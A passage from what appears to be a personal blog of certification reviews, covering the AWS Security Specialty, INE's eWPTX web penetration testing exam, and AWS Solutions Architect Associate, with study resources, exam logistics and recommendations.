    According to the specification, the AWS Security Specialist certification exam is divided into the following key domains:

    • Domain 1: Threat Detection and Incident Response (14% of scored content)
    • Domain 2: Security Logging and Monitoring (18% of scored content)
    • Domain 3: Infrastructure Security (20% of scored content)
    • Domain 4: Identity and Access Management (16% of scored content)
    • Domain 5: Data Protection (18% of scored content)
    • Domain 6: Management and Security Governance (14% of scored content)

    Like my last AWS exam, I felt that this was an accurate representation of the actual question split on the exam - although Logging and Monitoring felt a bit heavier than 18% on my specific exam.

    Study Resources

    As I’ve mentioned in previous reviews, AWS does provide a good variety of resources to help you study for the exam - on top of this there are some excellent third-party providers offering some affordable and enjoyable training. Some key items to check out include:

    • AWS Official Documentation: I find reading through lots of documentation a bit challenging, but AWS’s training materials do a good job of signposting the most relevant ones to focus on. AWS offers extensive documentation on each service, architecture best practices, and whitepapers - I’d spend some time getting to know these for all the named security products on the exam. This is far from the most fun way to study, but many of the actual exam questions felt like they were lifted right from the documentation.
    • AWS Skill Builder: AWS provides a variety of useful resources, reasonably priced at $29 USD + tax per month - I’d recommend this for at least a single month.
    • Official Practice Questions: AWS offer a free official practice exam (20 questions), find it on the exam information page, or through Skill Builder.
    • Official Practice Exam: Available as part of the Skill Builder subscription. Last time, for the Solutions Architect Associate, I thought the practice exam was a great representation of the actual test - this time, not quite so much!
    • Online Courses: Outside of AWS official resources there are plenty of courses available from platforms like Udemy, or subscription platforms like ITProTV or CBT Nuggets. Not on either of these platforms but well worth your time are the courses from Adrian Cantrill.
    • Labs: One of the best things about practising for an AWS exam was that labbing was very easy to do - simply create an AWS account and try things out. You’ll want to ensure you have cost management in place before labbing much for this exam as many of the security services can be quite expensive!

    Preparation Tips

    Like many higher-level exams, this one seemed to focus quite heavily on nuances and edge cases, so don’t fall into the trap of concentrating only on the features which you’d most commonly use. I’d also be very familiar with services such as CloudFront, CloudWatch, CloudTrail and Security Hub which will certainly appear on the exam, but can also show up as part of a broader or more complex question.

    Much more annoyingly, AWS seem to have fallen into the trap of making their higher-level exam questions “harder” by producing incredibly long, overly wordy, intentionally confusing (perhaps a little bit harsh there..) questions which take forever to unpick. In actual fact (and here’s the key on the exam) much of this fluff makes very little difference to the answer to the question, but you’ll want to practice spotting keywords and phrases being used and mentally preparing yourself for an awful lot of reading and re-reading before you sit the real thing. Seriously, I like to study - I read a lot and I take more exams than is probably normal for a human being, but halfway through this exam I was exhausted with trying to wade through these questions!

    While studying, remember to pay attention to the relative cost of services, as well as their complexity and ease of use - a fair few of the exam questions will ask for the “most cost-effective” or “least effort” solution.

    Exam Experience

    Exam booking is through AWS’s Certmetrics platform and was straightforward; all exams are now delivered by Pearson Vue (PSI was previously an option but no longer) and can be taken online or at a test centre. I took mine online, as is my preference. Nothing unusual or interesting to report in this regard, other than the fact that you are not shown your score, or even a pass/fail, after the exam itself. There’s speculation online that not being shown a result straight away actually means you have provisionally passed, but I can’t confirm whether that’s 100% true - it held in my case, and I got my pass notification about 10 hours after the exam (which was quicker than last time!). I must admit I’m not a fan of this - one assumes that AWS are reviewing exam recordings for signs of cheating, but isn’t that rather the function of the Pearson Vue proctor? Either way, be ready for an additional wait after the exam itself.

    The exam itself was fairly straightforward - as with most (but not all) exams on the Pearson Vue platform you can go back and forward through the questions and bookmark any tough ones for review; this time round I used the feature to bookmark questions I was too tired to keep re-reading!

    One real positive for this exam was that AWS seem to have decided to avoid questions involving double negatives, or those “select the option which does NOT” type answers, which I always find extra confusing for no real benefit. A new feature was the ability to change the colour of the exam interface - I hope this is going to apply to all Pearson Vue exams going forward, as I found it quite nice to change the colours from time to time. I still finished with a massive headache, but there you go. The exam time was plenty - there are no practical simulations, just straight multiple choice.

    Should I get this certification?

    As a Security specialist, I wanted to get this certification, and if you work with AWS regularly it would certainly be a good thing to do! I firmly believe that getting as many people certified in security as possible is one of the best ways to improve our collective defence against all kinds of threats, and if AWS is your thing this is a good way to go. If, however, you have little background in, or knowledge of, security, I feel this would be a very difficult certification to begin with. Even if you do work with AWS regularly, but don’t have your security fundamentals down it might pay dividends to start with something more general (like Security+) before taking on the AWS Security Specialist. For what it’s worth, I studied for about 2 months on and off and around work - I’m sure you could work through the material much more quickly if you were able to commit to studying full-time and had a security background - I’d double that if you’re approaching it without much Security knowledge under your belt.

    Conclusion

    Studying for and taking the AWS Certified Security - Specialty certification was enjoyable and rewarding, even if the exam was a bit of a slog. The certification is a valuable and in-demand credential that demonstrates your skills in securing AWS infrastructure and services but, to be fair, it won’t make a massive contribution to your knowledge of security outside of the AWS platform (then again, it isn’t really supposed to!).

  • Other

    Introduction

    Having completed several other certifications with eLearn Security (now INE Security), I decided to challenge myself with the most difficult certification currently on offer in the offensive security path, the eWPTX. The exam was… “fiddly” - overall definitely one of the harder certifications I’ve gone for; however, a lot of this was for all the wrong reasons. We’ll get to that shortly!

    Certification Overview

    According to INE “The eWPTX is our most advanced web application pentesting certification. The exam requires students to perform an expert-level penetration test that is then assessed by INE’s cyber security instructors. Students are expected to provide a complete report of their findings as they would in the corporate sector in order to pass.”

    By the specification, the exam tests:

    • Penetration testing processes and methodologies
    • Web application analysis and inspection
    • Advanced Reporting skills and Remediation
    • Advanced knowledge and abilities to bypass basic and advanced XSS, SQLi, etc. filters
    • Advanced knowledge of different Database Management Systems
    • Ability to create custom exploits when modern tools fail

    INE offer formal training for this certification as part of their subscription service - I didn’t have access to this, but I’ve heard a lot of positive comments about the training experience. If you already have an INE subscription with access you’re in a great spot!

    In terms of structure, the eWPTX is similar to other INE Security exams - spin up your exam environment, conduct a pentest and present a commercial grade report. Meet all the listed criteria and write a professional report and you pass. For the eWPTX, there are several key “milestone” objectives which must be completed in order to pass, in addition to which you must find and report additional vulnerabilities not specifically listed in the letter of engagement.

    Study Resources

    Since I didn’t have access to the official course from INE, I used a combination of other resources to prepare around the topics listed for the exam; the most important ones included:

    • HackTheBox: At this point, HTB has content which can serve as training for almost any hacking exam! I spent time focusing on machines (usually with writeups to check my work) which featured typical web attacks (SQLi, SSTI, XXE, XSS, SSRF, CSRF etc.)

    • Vulnhub: Much less important to me these days since I find spinning up a box via HTB much easier; however, Vulnhub boxes are still an excellent way to focus on the core attacks mentioned above

    • Portswigger Web Security Academy: From the folks who bring you Burpsuite, the Web Security Academy is well worth working through, and a great way to get more practice with Burp.

    Preparation Tips

    Without giving too much away, it’s fair to say that this exam is hard - however, it’s hard because it’s “fiddly”, not because the exploits are especially unusual or exotic. Therefore, if you have a good grasp of SQLi, SSTI, XXE, XSS, SSRF, CSRF etc. you have a good start. You will want to make use of automated tools on the exam (there are no weird restrictions à la OSCP) so do be sure to have plenty of practice with them too. Burpsuite or OWASP ZAP is a must - you’ll also want to be comfortable with common web attack tools like SQLmap and Dirbuster (or similar).

    A big aspect of preparing for this one is the psychological game - I read quite a number of reviews up front and took on board that there may well be some instability in the environment, as well as some exploits which needed firing a few times to work. What I didn’t really understand was that some payloads would work literally only once and then require a complete reset of the environment - this threw me on the exam, and in a few places I was only able to move forward by throwing the same exploit again and again out of sheer frustration!

    Therefore, have uppermost in your mind:

    If you think you have found a vulnerability, and it looks exploitable IT SHOULD BE. There are no “rabbit holes” on this exam, so if it’s not working, just keep resetting the environment and re-sending the exploit until it works.

    Exam Experience

    As you may have sensed, I had a few issues with the exam experience - as many others have reported elsewhere.

    Let’s begin at the beginning - the process of getting a voucher, activating the exam and downloading the letter of engagement was all fine. As with all INE Security certifications, you can start this one whenever you like via the dashboard. The dashboard also allows you to generate a VPN config file and reset, stop and start your exam environment. This all worked fine and was a nice smooth experience.

    The lab itself - not quite so smooth! During previous INE Security certifications, I have experienced varying levels of connectivity problems - specifically the VPN would seem to randomly disconnect with the target hosts becoming unreachable, often without any actual error output from OpenVPN. The eWPTX was not terrible for this - but it wasn’t great either. I experienced one or two disconnects on most days, usually just requiring a restart of the OpenVPN process, but sometimes needing a lab reset. Overall manageable enough for the context, but certainly room for improvement.

    The biggest issue then - by far - was the instability of the critical exploits needed to pass the exam. As mentioned above, the exam is structured in such a way that besides the usual work of finding and documenting vulnerabilities you also must exploit certain paths. The major issue for this exam is that these essential exploits seem to behave erratically and inconsistently. Payloads that I confirmed to work on one try would often not work again - sometimes after an environment reset, they wouldn’t work at all. This leads to a situation where a candidate can be using exactly the right payload, but not actually getting a response - at the very least this is unfair and in my opinion, INE really need to address this. I think it’s fair to say that if I hadn’t already looked at a good number of reviews and prepared myself for a lot of issues with the “critical” exploits I would have given up!

    More broadly (and unlike other INE Security certifications) this one felt much more like a CTF than a pentest - personally that’s not my favourite “feel” to an exam - but it’s not excessive. The scenario feels contrived, but not ridiculous and there’s enough general context to make writing a sensible report more than doable. The flip side is that practising for the exam using HTB or similar CTF platforms is probably more applicable than it otherwise might be!

    Should I get this certification?

    I have always been a fan of the eLearn Security certifications - for the most part, they’re flexible, realistic and fair. The eWPTX wasn’t terrible, but it wasn’t quite up to the usual standard, and in addition, it was inconsistent and somewhat unstable. One major caveat to keep in mind is that I did not take the official training, and I wouldn’t be surprised if the official course had example payloads or a different approach to exploitation which may have worked better on the actual exam - nonetheless, a working exploit should always be a working exploit.

    If you have an INE subscription I’d say the eWPTX is a good goal to aim for - similarly, if you’re fairly confident with web exploits and have the fortitude to keep telling yourself “No, this should work!” you should be able to pass the exam. This being said, for those who have less experience, less confidence or just less patience, this might not be the best certification for you, at least in its current state.

    Conclusion

    The eWPTX is a good concept, but it’s crippled by technical issues and instability which make it borderline unfair. I wouldn’t be surprised to see INE update this certification in the near future, and I hope they do because there’s certainly a place for it in the market - right now it just needs a little love and a few updates.

  • Other

    Introduction

    After some years of working with AWS but not getting around to certifying, I recently decided to dive into AWS certification with what seems to be the most popular choice (at least for a first certification) - the AWS Certified Solutions Architect Associate. This is my quick review of the certification!

    Certification Overview

    The AWS Certified Solutions Architect – Associate certification is currently one of the most sought-after credentials for professionals who want to showcase their expertise in designing scalable and highly available AWS solutions - and although I’m often sceptical of the validity of “Best Certification” lists, this one comes up often enough to show that it’s certainly in demand. Per AWS, this certification “Showcases knowledge and skills in AWS technology, across a wide range of AWS services. The focus of this certification is on the design of cost and performance-optimized solutions, demonstrating a strong understanding of the AWS Well-Architected Framework” - I’d say that’s a fair description of what you’ll get out of studying for it!

    Overall the certification is essentially a sweep through the various services offered by AWS, with a focus on the Well-Architected Framework and cost optimisation. While this is definitely a step up from AWS Cloud Practitioner in terms of technical knowledge, you won’t need a deep understanding of IT infrastructure to pass this one. Knowledge at the CompTIA A+ / Net+ / Sec+ level should be enough if you’re after a rough benchmark.

    AWS states that “This exam does not require deep hands-on coding experience, although familiarity with basic programming concepts would be an advantage.” Truthfully, I’m not sure that any understanding of programming was really required here - familiarity with JSON and YAML is required for the exam but being able to read and understand the format was enough.

    Exam Details

    • Exam Title: AWS Certified Solutions Architect – Associate

    • Exam Code: SAA-C03

    • Exam Format: Multiple-choice and multiple-response questions

    • Duration: 130 minutes

    • Passing Score: Approximately 720 (on a scale of 100-1000)

    • Prerequisites: No formal prerequisites, but having some experience with AWS services is recommended

    • Exam Guide: AWS Certified Solutions Architect – Associate Exam Guide

    Exam Domains

    According to the specification, the AWS Solutions Architect Associate certification exam is divided into the following key domains:

    • Domain 1: Design Secure Architectures (30% of scored content)
    • Domain 2: Design Resilient Architectures (26% of scored content)
    • Domain 3: Design High-Performing Architectures (24% of scored content)
    • Domain 4: Design Cost-Optimized Architectures (20% of scored content)

    Overall I felt that this was an accurate representation of the actual question split on the exam - if anything, cost optimisation featured a little more heavily than the listed 20%.

    Study Resources

    Unlike many vendors (mentioning no names) AWS do provide a good variety of resources to help you study for the exam - on top of this there’s some excellent third party providers offering some affordable and enjoyable training. Some key items to check out include:

    • AWS Official Documentation: I find reading through lots of documentation a bit challenging, but AWS’s training materials do a good job of signposting the most relevant ones to focus on. AWS offers extensive documentation on each service, architecture best practices, and whitepapers - I’d focus on the core documentation for the exam.
    • AWS Skill Builder: AWS provides a variety of useful resources, reasonably priced at $29 USD + tax per month - I’d recommend this for at least a single month.
    • Free Official Practice Questions: AWS offer a free official practice exam (link below) - worth a look.
    • Official Practice Exam - Available as part of the skill builder subscription, I found this to be quite representative of the actual exam - better than most practice exams.
    • Online Courses: Outside of AWS official resources there are plenty of courses available from platforms like Udemy, or subscription platforms like ITProTV or CBT Nuggets. Not on either of these platforms but well worth your time are the courses from Adrian Cantrill.
    • Labs: One of the best things about practising for an AWS exam was that labbing was very easy to do - simply create an AWS account and try things out. You can test out 99% of the services on the exam for free as part of the free tier.

    You can find the complete list of official resources from Amazon here.

    Preparation Tips

    Being able to compare and contrast different AWS services is key for success here - therefore while you’ll want to get some hands-on time with the services (not least because this is the fun part), spending some time making lists and tables which allow you to memorise the key selling points for each service is also a valuable use of time. Many of the harder questions on the exam did require you to choose between two viable options within AWS, so understanding which products are cheaper, faster, more user friendly or come with better resiliency will help greatly here.

    As always, it’s a multiple-choice exam, so ensure that you’re doing plenty of practice with exam-style questions in the run-up to the test - being a wizard on the AWS platform won’t be enough to pass if you can’t work through the questions in the allotted time!

    Exam Experience

    Exam booking is through AWS’s Certmetrics platform and was straightforward, all exams are now delivered by Pearson Vue (PSI was previously an option but no longer) and can be taken online or at a test centre. I took mine online as is my preference. Nothing unusual or interesting to report in this regard, other than the fact that you are not shown your score or even a pass/fail after the exam itself. I had to wait just over 24 hours for an email confirming I’d passed.

    The exam itself was fairly straightforward - as with most (but not all) exams on the Pearson Vue platform you can go back and forward through the questions and bookmark any tough ones for review. There were no especially hard or “unfair” feeling questions - certainly a few tricky ones but nothing way out of left field. I finished the exam with plenty of time remaining and didn’t feel any more rushed than the usual exam stress leaves you feeling!

    Should I get this certification?

    Overall I found the certification to be enjoyable and accessible, and I think most people would have this experience. Personally, I found this a great way to formalise my knowledge of AWS and to explore services which I wouldn’t normally use. What would vary based on your background might be time to complete. I studied for about 3 months on and off and around work - I’m sure you could work through the material much more quickly if you were able to commit to studying full-time.

    If you have other cloud certifications this will be an exercise in learning how things are done on AWS, and if you’ve been using AWS for some time but don’t have a certification, it will be an exercise in exploring many of those services you’ve never looked at - neither of these would take especially long in my opinion, and if either of these describes you I think you’ll enjoy the certification.

    Those with a tech background but little to no experience in cloud computing may want to start with the Cloud Practitioner exam first - this is an easier introduction to the subject (and passing it will award you a 50% discount coupon for SAA, so you don’t lose out much financially). Failing that, getting familiar with the way that cloud “works” will take a bit of study and some lab time to get comfortable with some concepts, however, you’re unlikely to encounter anything especially mind-bending studying for the SAA, it’s more a case of translating your on-prem knowledge to a cloud model.

    If you’re just getting into the technology field, however, I’d strongly recommend the Cloud Practitioner exam first - this exam (and the free material available from AWS) is written very much for those just getting started - this would be the best place to start!

    It’s also worth mentioning that the three AWS Associate level exams (Architect, DevOps and SysOps) share a lot of common content, if you’re planning to take more than one, I’d recommend starting with the SAA - the high-level view it gives you is great framing for the other certs too.

    Conclusion

    Studying for and taking the AWS Certified Solutions Architect Associate certification was enjoyable and rewarding - the cert itself is a valuable and in-demand credential that demonstrates your skills in designing and implementing AWS architectures. Next up, I’ll look to take the AWS Security Specialism exam, which aligns more closely with my main interests and areas of work, but I’d agree with the many reviews and recommendations online that say SAA is an excellent starting point for getting your foot in the door with AWS.